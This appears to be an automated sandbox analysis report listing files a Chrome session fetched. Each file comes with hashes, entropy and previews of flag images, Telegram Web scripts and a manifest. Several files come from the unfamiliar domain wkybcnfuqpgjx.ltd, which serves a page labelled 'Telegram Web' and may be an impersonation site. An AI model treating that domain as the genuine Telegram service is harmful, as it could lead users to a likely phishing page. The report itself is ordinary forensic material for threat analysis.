                                  MD5:0B260E6A6313D640FB955E2A0C89BFEA
                                  SHA1:71B4B930B76B70232B8B63DD0E2623D431DD7B65
                                  SHA-256:6D07D999E76DBC8D70405B4ACABE26E9B30EBD1A6383902B96DD6A201872E9CD
                                  SHA-512:31A2CEF680E058FDA77075F6A897BEA206D10B48BD4068A330D32C7092E18B7D6BE7A006095A8B0CF24C42BDEE3E92A9AE7EC279D81792E2B79A041638DD99CF
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLEYNDUL*I8.A&ggg.?(eee....Y7...iii.A(.B'ccc..*v..o...8..)5Z. .C(aaalll.?'ggg.H-.; ]]]jjj.@%.:.aaa.J..E*fff.C'*..lll]]].G,jjj.:..............................................................................................................................................z.b......gr.\kX.zx}{.Q_@.j.?O.HUlml:.ahhh&.X%.X%.X$.W%.W.3D#.Vddd#.U.*>.0A..S!.Saaa .R..?..Q$.R..P.,=^^^.MB..QOiG]]].*;..M!}N.1>\\\.%7..K.(9..7ZZZ.~K..LXXX.|I wK.%6.$5..E.yF..1UTT."3.!2.pF.vC.sC..0QQP.z@.'3..+....s@.47ONM.jB..,.l@.p>.v<KKKAT5..*.'0.f?..'.n;..(f>/.l9..'.e;GGG.`<..%.i7.b:..#..$DDD..$.g4.\8.."..".e2AAA.Y6.....!.. .b1..'.. .]1...j).<<<3A9.R2....X*...888.R,....K.465.N)432....G(...p..///.C%z..]..+,,u...>!)))m..&&&%%%.8.###B..!!!.............................................#.c9...+tRNS..."48LRcbcdfwx~~~..........................(......IDATx...Ml..y....13;...$%.c+..[H..U.....IS....z+.C/.....P.>..@/....C.)Z.I..0R7h.[G...\...AQ.).......wf8.~pw..J../bV..|.x.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:HTML document, ASCII text, with very long lines (413)
                                  Category:dropped
                                  Size (bytes):2544
                                  Entropy (8bit):5.119071748552234
                                  Encrypted:false
                                  SSDEEP:48:p8izjb0Kn4YK+FH7X+IDxMp8GQF/7whyls5BhuezEzD/VzDatJzVvWz1uz0yAzJB:p8izjb0Kn4/sHaIDxMp8GQNo5kEtXvQB
                                  MD5:DA7800EA928A021F2539AB41E6F2323E
                                  SHA1:0141DA1DC85CA8F34212F3DDE2FAC9BF61F5ADB7
                                  SHA-256:15C24EC2B4CB94F24E66750F09E7071E5659E20A5ED926F69F565E20A81027CF
                                  SHA-512:228CA1C1F1FF8DE139EBCFA7B084BC40D467A56DDCCD103CF02A3FA26BA8C1B4D1961904511198E2FB6797837414BB3C09FC9F0902C3874F2467F279D526F0A9
                                  Malicious:false
                                  Reputation:low
                                  Preview:function compatTest() {. var hasPromise = typeof Promise !== 'undefined';. var hasWebSockets = typeof WebSocket !== 'undefined';. var hasWebCrypto = window.crypto && typeof window.crypto.subtle !== 'undefined';. var hasObjectFromEntries = typeof Object.fromEntries !== 'undefined';. var hasResizeObserver = typeof window.ResizeObserver !== 'undefined';. var hasCssSupports = window.CSS && typeof window.CSS.supports === 'function';. var hasIntl = typeof window.Intl !== 'undefined';. var hasDisplayNames = hasIntl && typeof Intl.DisplayNames !== 'undefined';. var hasPluralRules = hasIntl && typeof Intl.PluralRules !== 'undefined';. var hasNumberFormat = hasIntl && typeof Intl.NumberFormat !== 'undefined';.. var isCompatible = hasPromise && hasWebSockets && hasWebCrypto && hasObjectFromEntries && hasResizeObserver. && hasCssSupports && hasDisplayNames && hasPluralRules && hasNumberFormat;.. if (isCompatible || (window.localStorage && window.localStorage.getItem('tt-ignore-compa
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4955
                                  Entropy (8bit):7.929685248772786
                                  Encrypted:false
                                  SSDEEP:96:ojDM6SGEsNFisVLYnLAaXKgtmLyJ4SsWtjJnpLH9RQyDaHXC3TGz/87:6M6SGxFRV4LAaNmmp9Qyu0TGz/q
                                  MD5:98766D2EBE764DF9BD84A6B933E8EFF7
                                  SHA1:C6631457580DEDF75BEE8A8A22B0ADCAE0939731
                                  SHA-256:7B962CAD70DEBF896B55DCC16FB47E99EDC2B67A24CE81CD2CCAF65D18BD2FAC
                                  SHA-512:32943BA32964B8CC24E48AFED55FF21B03AACF1104E0111B3924143B679471A1ABC13FD87008F20AA1B9B1E9D8293776D0F7A527CA68983FC18AB7E5E0EF753F
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.W*....?_.u$U{..6.u..1.w.>].x.u.B\.A`.?^.A\.r.{.A^.Cb.9X.A`..l.oD~XNzL.IO.....G......*.Q9..!.F..I."(#.I.DJ..D.GM1.W.c.:..........D..@..>......2.Y.@F.#....%+6.].+1.....A..T8..0~...G..B:.`.f.....(..V).7(v..~=.Z*-|.+.P7....U.9.;A.<+y..28.w.e/7..3..$.J"o..o43...>.1.5.j....$q.......v8.6<..4....Ii.,..M....&.l.%s..'....Lp...#X..p.....@.4;....Ee..k.8......$c..=A.}..7W+o..J.;[.,0.O{..U.Rx.j..\.k.b.8..C.{;.J..7.V. [..O....]./t.....h..Dk.@a)k.....[#....3.'._..d..&`..-1.51y.5.[./4H.f....4<)g.....X.CI=.c...5|..J.;@..W#.c.49. ..c..}....2.....p....$.u)...."'.........*......Y.u........\t.M$.e'..X.R^f...j.j......t.V|.J.Z.GP.....$o...H.`^......e.N#..dPt.nS+.Z%.K.w|ms....|Vx..N..........[_......}.U&kB)vO.@Z...:J...Ya...=<V..hz.x......tRNS.~a.bbkc..<.,.Gf..z...(..k.'.....IDATx...o.P..q..5.5..[2}..L!N..CHv...d...CN...2.YEg...X.. A..8.81.r....^I....d.&.....k...d2.L&..d2.L&..d.%MS.....%....e>@..*.B.s.......B...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5347
                                  Entropy (8bit):7.940513274274703
                                  Encrypted:false
                                  SSDEEP:96:ay0598manohkubkRFlY7OIhzC1LAxlmFThThYY/MereEXY9IWSiIgkrtNN:JA96op8TY7OIh+ixcFgcMHEXY9IbPg6N
                                  MD5:AD0A8CB4DF90BA1BBF75BF420DB2AF90
                                  SHA1:5C10A9A2F728B22835FC29D8350A74819C84264C
                                  SHA-256:EB486CE718AE68522FAC35F6A1FC0A039EF6CCD00790886BF313B245AE87BBCF
                                  SHA-512:AF6A04B6E097F03C52E0C70415013D1CA6A9897C097B04E98169E3DB7F8799B237CEDA9A7380745D7FC67566CB38E0FA9E6CCE453D1A1822F595F02E790346E8
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLe.p&Fk'Hnk.un.x(Hm)Hnj.t<c."z0(HnV.>i.r/Gj.....(k.v(Hm)Hmi.s&Fln.w,Lr ?er.|e.o.Ms!@ffn<..6..4..:..;.....:../..*.5..'.6.).:.).=...:..,.>.,.z=E..`..L..\...q<.z-[..Z..Z...j>Y..B.UV..T....HY..(.H.j/:.N.`>9..4.J..IF..Q..4.I.k.}x.3.HN..3.HQ...]5/.Di.N..?.QFK....C..?O..\.H..5..*.?F..z.N.gP.O7E..[v.(.=K}.G}.A}...6.AE$.9,..?z.Ex. .6=y..NQ.8d.W..jI..1..4.C5;w..1W..3<t.9t.Br.[f..)U.=q7r..98.)U../.(SAn..#T6p.P{4.&R..,.,F.%P..%..M.ZC.$O..*mT...S.#N./:4k...@;h...(.!L.F..8E".2%.4..%;e...J..I..E.H?..$.&S..$:b...H1b...E."8..N..E7^...?..C.4hhU-.y...H.73.&K..@4Y...?..A.Y...M..=..8..<..E2T}..9..;..7/Pw..8..7..2$R...5..4..?..E..3(Lw..;..<..'..1)Hp.....0S5]..5...!Dk..+..*..).?e..&..$X.<..!...{..B.OG.QO.Z-.@S.`O.Zh.s4.D<.L#.6d.oU.dp.y`.j@.Q7.I'.8!.5^.kB.SZ.e;.>K.ZK.\.......tRNS...,0ADV^ccgir{~.....................tIDATx^...j.!......p!.....8....2^...Tzq......p/............ZG<q......2m.o......OOm.V..vXWi....8.}..te..X.J.D.!...z........".m.....b.D*y
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (14402)
                                  Category:dropped
                                  Size (bytes):14456
                                  Entropy (8bit):5.480783176887179
                                  Encrypted:false
                                  SSDEEP:384:1UkSTrXtVSGpk8UDEua/4L+DnOQUluZIah87A6hXm1WdHgl2scj/2y:1UkSTrXtVSG+8UDE1AL+DcuZv87A6tCM
                                  MD5:6471DBAD18AD444906E7A2BBAC930E90
                                  SHA1:2C1F84CAF20C633205F7535B129AE069187EF14D
                                  SHA-256:1FCE51354CFB15E01D900A86D9806D476A4CEB7FD409A5F2744E8BB81FAB56E8
                                  SHA-512:EE3D964125EE12B14230F7577FF23B2C62BBB924D234596A4A74A184431F6BF3DD11EB606B345DAEEA218275C5B84919AF6D35DDB64D5A53E08945C20AACC339
                                  Malicious:false
                                  Reputation:low
                                  Preview:(()=>{"use strict";var e,t,r={2976:(e,t,r)=>{var a=r(7784);const o=("undefined"!=typeof window&&window.innerHeight,Math.round(450),new Set(["newMessage","newScheduledMessage","deleteMessages","deleteScheduledMessages","deleteHistory"]),new Set(["image/png","image/jpeg","image/gif"])),i=new Set(["video/mp4","video/quicktime"]);let n;function s(e){n?n.push(e):(n=[e],Promise.resolve().then((()=>{const e=n;n=void 0,e.forEach((e=>e()))})))}new Set(["audio/mp3","audio/ogg","audio/wav","audio/mpeg","audio/flac","audio/aac","audio/m4a","audio/mp4","audio/x-m4a"]),new Set([...o,...i]),new Set(["USERNAME_PURCHASE_AVAILABLE","USERNAME_INVALID"]),new Set(["t.me","web.t.me","a.t.me","k.t.me","z.t.me"]),new Set(["AU","BD","CA","CO","EG","HN","IE","IN","JO","MX","MY","NI","NZ","PH","PK","SA","SV","US"]),new Set(["USER_CANCELED"]);const c=new Map,l=function(){const e=new Set;function t(t){e.delete(t)}return{runCallbacks:function(){for(var t=arguments.length,r=new Array(t),a=0;a<t;a++)r[a]=arguments[a]
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4765
                                  Entropy (8bit):7.838650543201864
                                  Encrypted:false
                                  SSDEEP:96:GsnR8YVzCDeSNO08Xkt7p74/r44th9bE3rl33hHxWzYnTkG1gRR:G672De30VOhE3tLW0wG1gRR
                                  MD5:22A0FE23A23438D6F7D912FAE6A32D58
                                  SHA1:86ABF7C0B813F06BD2243105149D6B95A5982FF5
                                  SHA-256:A9BF9035B8D8ED594F97F5125B709AE03B0315F629451B481CE39E4C80BA8EF3
                                  SHA-512:057015942CCF5A8A71FE02D0D8FB9AAB22C3CDE322127E1F22ADF696B148EFC9E2478FA33912846D0C11AC2AFE69A573B2ED0FD9FA8487BD51BE3146A9F923F3
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL./2.\^p...dgn...npm..n...BF.nq.....".+^l...aco...jmp.........qr|....H.&+.lop...BEm...oq.cfn...psm...gjt...qtn...QV.cgg....................................................................................................................................................................................................................................|........|..nr.......ps.`d.knr...fi.ad.TY.Z].cf._b.QVgw..WZ.^a.IN.Y\.JN.QU.AF.LP.SV.@E.:?.JNTi..BG.39.38.16.06.=A.AE.16.6;.+1.-3.*0.-2.49.'-.+0..3CY.. &.$*. &.%*.)..59. &.$).....#.',..$....!&...3M...........!&....#'.......D|&D....%C..."$B......."@............! >..;..............9.~......6.w......4.....2~y...0r.0|./y...o.........-g.-y|...*v.*].)sp...'}.&rg...$p."v."n. k..j..h..r..`..\..S..h..I..F..`..Z..C..,.....tRNS....$/9CSY^cccdjmwy~~~~~........................................................................................................................................................{./
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5169
                                  Entropy (8bit):7.91602430754403
                                  Encrypted:false
                                  SSDEEP:96:2lEw23KRGJvdMQJUKLlZCsC5SDfD6qnfrrD+A9NIWGJzOEo5c08:2Ow+LJvdhSfsCofWqd9NSOEo5l8
                                  MD5:53292691C2E3315069B9798B260C7F8E
                                  SHA1:ADD170891D5254F831AD967F4D35321421FA23A4
                                  SHA-256:09614E706F06E7B4DC9E0E02E498DE0E26C6E08EC25FD1EEE242F4FB19FA04D2
                                  SHA-512:32B064349A44A0F998B45AB973261B39D5A9A5BFA05C0AD767E58DD3E856367CAA316FE9E6A375A7499F0BA993C57384955597973C4C7A5162DD7C1C18774BC5
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1fc.png
                                  Preview:.PNG........IHDR.....................PLTEGpLCZp...D\r...`z.>Ul...?Vl......@Wl...t..?VlZx.Si.......6J]...C[q...=QdQo.Ca{...^x....AYo...>Vkp..@Xm...AXn...9Pf...G_uC[p......E]r......8Oe...D[r...b........................................................................................................................................................|..................~..w..}..}.......|..{....v..}..z....y..s..x....w..z....v..u..p....t....x..s..r..l..{..q....r..p..o..n..q..}..n..m..h..u..p..l.....k..n..h..j..n..i..x..h..g..f..j..`..c..e..j..d..d..d..c.....i..c..b..]..n..b..a..`..n..`..d..Y..^..c..}}}a..T..\..Z.._}.Y~.U{.Yy.rrrXv.Rv.Ur.Nq.iiiMo.Om.Mi.Ke}Ed.Hbx\\\Ba|G_vC]u@Zq=VlPPP:Sj8Pg5McFFF>>>666...&&&%%%$$$###"""!!!...........................................[....3tRNS.......%/5=DSUUcccdegi{z~~~........................3.......IDATx...O.$.]....W.z....k{..K. Ar....s2.M......HH\8p...E..(R"..!8.2.l.G..e.C$."........twU....{.S..3=...........W
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:JSON data
                                  Category:downloaded
                                  Size (bytes):1174
                                  Entropy (8bit):4.166203119056516
                                  Encrypted:false
                                  SSDEEP:24:wcLvQrf7+QWesfS0NjCBN+5up2Yyf5tt6b4TaDTxhn:9C5W1fZNjCBPw6bHH
                                  MD5:380929FC234CD3312DF9B76886EDB3F6
                                  SHA1:90A81A29FB36AF658509EF9FB5D2648AF9A135D4
                                  SHA-256:AC46FD5680C1929E49CADE11A2186E222CBDA6146CCA49F3C995CCC0F7AD1616
                                  SHA-512:0B9612B2BBEFBE74B179BFA4A454A4180493DE93C3369AF0B307E12E1CF393323D7DF8A3F20F3D95D219BFBF3633DF3A702BC7667E4F493FF9C2B0478206F2C7
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/site.webmanifest
                                  Preview:{. "name": "Telegram Web",. "short_name": "Telegram Web",. "description": "Telegram is a cloud-based mobile and desktop messaging app with a focus on security and speed.",. "start_url": "./",. "gcm_sender_id": "122867383838",. "icons": [. {. "src": "icon-192x192.png",. "sizes": "192x192",. "type": "image/png". },. {. "src": "icon-384x384.png",. "sizes": "384x384",. "type": "image/png". },. {. "src": "icon-512x512.png",. "sizes": "512x512",. "type": "image/png". }. ],. "screenshots" : [{. "src": "screenshot.jpg",. "sizes": "1280x802",. "type": "image/jpeg". }],. "share_target": {. "action": "./share/",. "method": "POST",. "enctype": "multipart/form-data",. "params": {. "title": "title",. "text": "text",. "url": "url",. "files": [. {. "na
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4839
                                  Entropy (8bit):7.907389311814296
                                  Encrypted:false
                                  SSDEEP:96:OnYePFPpDf8IlPClRl+regvYgVSK63P1iE5JGs4az2va1w+m:W8EalfUegvbX63Pn5J/4azSa1pm
                                  MD5:BEABABBCB622C318C70F1AA0BB3C9367
                                  SHA1:D857ADA05DED33C2B30E46E94FF9D031C8EFDA1D
                                  SHA-256:A015783E42C00AFF91E42A8F736AC67DD4027BF4D2EAEC5F0AA3FC01914E4C35
                                  SHA-512:C7241560F7EF118F7088BB54A49CCB0634EB61A277E2741BF8742B6D5737C711258634B2EBB478009FAC596FC6CAB9CE67301D33CD4A2DD9F07D2071E626EFAE
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLf..f{.]!5\s.g..h}.f..\s...+.7yf..j.._l.h.......}bx....h~.f..i..'D.ez.g..Ri.e{.l..g..aw.g..aw.k..Oe.c...................................................................................................X.....~....................o..(..........H..o.....^..&..... ....>...............W.$...........................z....x...S.kw......k...vx.}/e{..P^_v.Xt..LZ[q.So.Oo..09Rj.Gj..4F.4E.3E.2D.1Cu[].2CHd..0B>d../A.,;.&.Ac..0B.-?.,>C_..9\.As.->.*<6^..(:.,=7[..&8_I.<Y..Z.. 2.&7.#45V..)8.U.&V...#&U.. 2%T.$T...0#S..W..!1+R.#R.....'6.Y.!Q.#P..!1 O...,o;@.N..!0(M.f4q.. ..*..).L.."/.K...(,H..I..I...&.!...#.G...'.F.n'X..".D...+..!.D........E...%.A...*.@..?.....>..>.z.(.<..;..."K'b.;.....;....x."q.$.9..8..6v....6.))w.5.m...3.x...1../.f.....o...).`......%......tRNS....'+8DTbcbemw~~...............................................................................................................l.j3....IDATx...{.\W}...=..s.....w.y......4..BIiC.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3186
                                  Entropy (8bit):7.836207464093341
                                  Encrypted:false
                                  SSDEEP:48:hOKlr4kiyrmsOnAcDepKPwYdCeodf4OJgHkvvmEQ/DghDLoEZ++OyVcKHaDvr:Vrj6vAcDeUddCf1gHyverK/oE4kdaDT
                                  MD5:ECF5649F1F9CA5BA4387419B940B0286
                                  SHA1:E2956C4B97D6A1DE37150423088C07A48DB3E471
                                  SHA-256:EDA78EC0221AC305FEFC93D0BF8BA7CF26396BA83A5E7CA5834369E5137ACFE5
                                  SHA-512:91D19080C0FB75CCA892914AA07C9035256C3F076AED0A48A31C555BF1EB25B4F6F518584C1BB0BAA79CED6A73A391997E7287D1F0ABE854D56016AC8C0CEC3A
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f9-1f1e9.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.^?.lxjbI./.l.neV.&.jS<.+.iabp..m.n.K.%.ap]k...3.l..3.jx..B.m.i. .es..4..<.1U.hv.lb....5cq..o.<Jj..7.drR`|.les.b...n..l..6.mcp..iv.n.k.#..6.lf. bq./@a.n...5.lLZw.apc...sz.. ..&.....&..$..&.....%..#.....&..$..!..$.."..-..7..$..!.....$.. ..6..$.....#.....'.....;.....D.....$..F.....M..S..". .i.Z.J.".a..................i..kw....et.cq....Yj._n.z..Yhgt..Rd.La.u..CF.Qa.p.^m..AZ.K].l.Yg..@V.6P.?SRb..+J.5N.+I.)HK_..'FM]{.+G.'E.2I.%D.$C..O."AEX|.(B. >.!??V...=.!=..;./?..<@Ru..;. <..9."<..9..9..7. ;..66Mx..6..8..4..4. 7..4..2..2..0..0..3../0Gk../.....4.$/..-..3..2..+..,*Cu..+.....*(?mt$&..-+=_..&.:oy.*.8s.7q.6h..$.6p.5o.4o 2Vm.%.2m.1j.1l.0d.0ju.../i..g..i.-z.,gg...+e.)>.*d.)[.)c.'aa...&Q.&_.%^.#W.#]."\."Q."Z.!H.!Y. X..V..F..=..R..L..:..E..<..5..2........tRNS........&169:IJSbcddfgmlvv~..........................................................................................................Y.....IDATx...=..E...~fvfwl...H8.C.7p.H.....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5169
                                  Entropy (8bit):7.91602430754403
                                  Encrypted:false
                                  SSDEEP:96:2lEw23KRGJvdMQJUKLlZCsC5SDfD6qnfrrD+A9NIWGJzOEo5c08:2Ow+LJvdhSfsCofWqd9NSOEo5l8
                                  MD5:53292691C2E3315069B9798B260C7F8E
                                  SHA1:ADD170891D5254F831AD967F4D35321421FA23A4
                                  SHA-256:09614E706F06E7B4DC9E0E02E498DE0E26C6E08EC25FD1EEE242F4FB19FA04D2
                                  SHA-512:32B064349A44A0F998B45AB973261B39D5A9A5BFA05C0AD767E58DD3E856367CAA316FE9E6A375A7499F0BA993C57384955597973C4C7A5162DD7C1C18774BC5
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLCZp...D\r...`z.>Ul...?Vl......@Wl...t..?VlZx.Si.......6J]...C[q...=QdQo.Ca{...^x....AYo...>Vkp..@Xm...AXn...9Pf...G_uC[p......E]r......8Oe...D[r...b........................................................................................................................................................|..................~..w..}..}.......|..{....v..}..z....y..s..x....w..z....v..u..p....t....x..s..r..l..{..q....r..p..o..n..q..}..n..m..h..u..p..l.....k..n..h..j..n..i..x..h..g..f..j..`..c..e..j..d..d..d..c.....i..c..b..]..n..b..a..`..n..`..d..Y..^..c..}}}a..T..\..Z.._}.Y~.U{.Yy.rrrXv.Rv.Ur.Nq.iiiMo.Om.Mi.Ke}Ed.Hbx\\\Ba|G_vC]u@Zq=VlPPP:Sj8Pg5McFFF>>>666...&&&%%%$$$###"""!!!...........................................[....3tRNS.......%/5=DSUUcccdegi{z~~~........................3.......IDATx...O.$.]....W.z....k{..K. Ar....s2.M......HH\8p...E..(R"..!8.2.l.G..e.C$."........twU....{.S..3=...........W
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):6678
                                  Entropy (8bit):7.948263375839368
                                  Encrypted:false
                                  SSDEEP:96:8TEit83RXMCn5B0Uu13vMThDP1Y7NIOqA6w/4zYLITFojeK2ZgMOOP:0EsCn5GU6vYDP1YHT4fwqKm
                                  MD5:B480A1B743E6F494F4005ADBA3B4DA89
                                  SHA1:3A6DC6E4274A7A0B44EDA40DCB135FA8FD4F2B57
                                  SHA-256:829FCA7534C881467BA0D265B4CF9531D6ABD0F757738AA8782FAA1ACE47BE10
                                  SHA-512:B488707919B7EED9484FCF189232A503260D41EF6129A1E0C3877088727F6E0B6F624B3509CB1CA713563D1CE44DB93A9B207E1C6423CA6B70D6DF65BC661C4D
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f0-1f1ee.png
                                  Preview:.PNG........IHDR.....................PLTEGpLlQc.rt *I.np.+L.xz.,N.+M.np.np...x.../2.5\.|~.pr.*P......nit....58.tv.,M.{}.NQ.oq.,M.{}.+L.rt.wy..P.|..%F.KN.mo............................................................................................@..x..............`..D........A.....B.....C.....C.....D........D.....D..K.....F......D.....J....?....J.F.........S....K............N.......M.{M}...rp....z|.pL.twu...np.il.pr.cK.^c.bg.ehf..o...VQ.Y_.gi.\^.JO.MQ.QV.ac.IN.FO[}..GK.SV.EI.Y\.@O`y..HM.CG.AE.:P.HL.?D.RT.MP.AE.:HQt..=A.;?..N.>B.9>.CG.7<.6:Jk..<?.48.6:Yg|Aj..26.6;.,2.CF.37.15.04..2.59..2.,07c../3.+/B`..+/.#(4`..)-.36.36.'*.(,2^..:=.'+.%).&*3[.-[..%).!%./2*W./V......1."&'S.+Q.!R..!$#P.....N.!M.(K~.J... .I.%Et.G..F..C.....B.!?k.@y....?..>}.:b.;r.;|.5X.5b.6k.6z.1T.0_.1u.-R.+o.(P.#F..R.Ws....&tRNS....%*8;NSaccccev|~~~~.................UO....IDATx...Kn#....^.$..j.K...p.l.d./r..@..2...s..`.d.C..A...^...1<~.F..n6..e..@..eI.....F.P...w..?..?...=....=p...=p...oi.....[....=.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4965
                                  Entropy (8bit):7.91574681553498
                                  Encrypted:false
                                  SSDEEP:96:M7fvJ/KpjFVIwA9uhtplpmC6vo1oarmMDg6BpYZqPYEe975j19K:Mrhuxqw+uhtBvx1NRpYZPL5jy
                                  MD5:D443BF3C431C50BC9C67F00416174CBB
                                  SHA1:A67D1E26D2EA519BE3DE404A45FBF2697F0134F5
                                  SHA-256:783D69C11B7E159EBFDF023B94FBA25C2236ED14AAD33C86F909F24D29E798C2
                                  SHA-512:3823385C27E4E774B73A6F873C75CD32115FD51571203E45212E311424586CA028FC0959BD2244147620EC34F51E89A0AD3A7C167E1FDB2F3656348B77A0FA41
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1f9.png
                                  Preview:.PNG........IHDR.....................PLTEGpLp.y.W.h.r.Z e.p.X.n.x.X.c.m.X....!x/p.z.T.f.p.W!..-x....;m.v.V.l.v.Y g.q.Y .Y!.Q.m.w.P..^$q.z.Z!b.lq.z.Q..]$E.P..&..%..$..#.. ..!.."..&..%.....$........#..".....!.. .............................*.......................)......................................4... . .....$x.9...e.?o.y.&j.t...d.o].j...W.fo.+M.EM.^e.oR.aY.fD.W...b.l.n,K.[<.PZ.e5.Jv..F.:<.O4.I3.I4.I4.IN.\2.G?.QY.d...1.F).L1.F2.G/.D=.N-.C..C.^/C.RM.Z2.FU.!..O+.A*.?..A(.=@.O.{...H,.@5.F&.;$.9-.?<.!".77.H..B .5-.?#.6..3..9..2$.7.n...+.B7..3..0'.9!.48.>.....-".5..'..0wg&..+&.6..+..5..)Pr0./6../..'..-".2..$va...%#.2..$..%..+ |...&iW"S`+.!?.w..~$..=..:.y"rC/..8.-2.r%.m)..6ZM...3.f'..1..B.l.../..3.a&.....-.c...6..+.].K@...).X...&..'.S.86#..#.N.|..9/.x..m..%&&&!...%.....%........#....T.....&tRNS.....(/9DTVccegv|~~.....................G:....IDATx...k.eg]....g........h5..m.)..../.i.......5...." .U0....H.....hH..`C.I..eh.v.Ng.3g..{]...<k..9k...9-H..L....O....k...3.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5767
                                  Entropy (8bit):7.934348710268063
                                  Encrypted:false
                                  SSDEEP:96:rz4PGakaeIBmnucJgzt26k2q71TdTdBlNQnA1pXGJobtCZK3Dnt:rUGa2nucJg5Tk2q5fUqRC4
                                  MD5:DDCE25D2C77C6092026E52BDA8EF3715
                                  SHA1:98A4845D371AC4431D264830B10E6812382E2752
                                  SHA-256:02A0B654961A882DC6844A81925E6E7328A77705E093283D77EA192FA99889E8
                                  SHA-512:122228C068964A9B68D6C4FAB6763B3B9ECAB50095D171CDED2DD73570C092BE467D4369BED755D9DCBEF9BE86D4C4328BADA303A261DB7C3E67B7053E26F3C4
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLRf..'Ne{..'Nhx..$K`v.l...%Kau..-Th}..$Km......],.7g\q..%Li{.."HZi..!R.oa?=Pbv..&Lm..au..&M_s..%Lk..m.._u..(O.$Jcw.l...)Obv.Og.OZ|..D.........................................................................................................v........f......U....;.^..@..<....=.8.G.7.7~......~3..S.{0t...{A.x-.u*o...wN.q&.p&.q-g..l...m$.tX.m,.j!h}.`~..si.g..i+dz..e..j=.c._v.Vw..a.Xs..b*\r..].qjvMq.Qp.Wn..aTLl.Qj..Y'Dh.Hg.Oe.`_n>d.Cb.:`.C^.pSH.K.4].9\.0Z.5X.+X.+X./W.+W.*W.*W.*W.6U.MPd*V.*V.)V.&V.)U.(U.(T."U.'T.-S.)S.sD.&S.%R.'Q.$Q."Q.7Lv#O.)N.&N.!N. M. L.%J..K.!J..J..I..H.!G.;A].F..F..F..D..C}.C."At.C..B..A..@..@..?~.?..>..<u.;m.<..<..;|.;.@12.:..8j.8..8..7w.7..5c.5j.6}.5|.4p.4{.4|.4..3z.1\.0f.1z.1w.0{./p.-U.-[.,`.,x.+i.)S.'`.%M.$V."O.!S. H..D}~\=...utRNS......$&/2=CLT[bbbdirw{~.............................................................................................=.lx....IDATx.....E....g<C.B0....7.M.!q..Vn\x!.\.........
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3893
                                  Entropy (8bit):7.883451824570228
                                  Encrypted:false
                                  SSDEEP:96:mVHCQyKbQllH90bRCgZtzDDQ5gwNKIf0CU+X:8HCQbbcRYIgZt/s5rSCLX
                                  MD5:5395A259D040862369A5EDAB491F21F8
                                  SHA1:BA735E3A28DEB0F781A1878B7233FCADC82FB74C
                                  SHA-256:6C2CDF71ABA7113D7E2794B4641290B0D572409FBF984A4FCFDA12B943BA18CE
                                  SHA-512:FAFBE87DBA9CA73CAAF46354E83BD506E630BB366690C2150B4527AE40F2162ECB0162F12F4E9ACD471434BDEAA2AF473FF6B3A5DD357D7477350981A8B3CF6E
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1e8.png
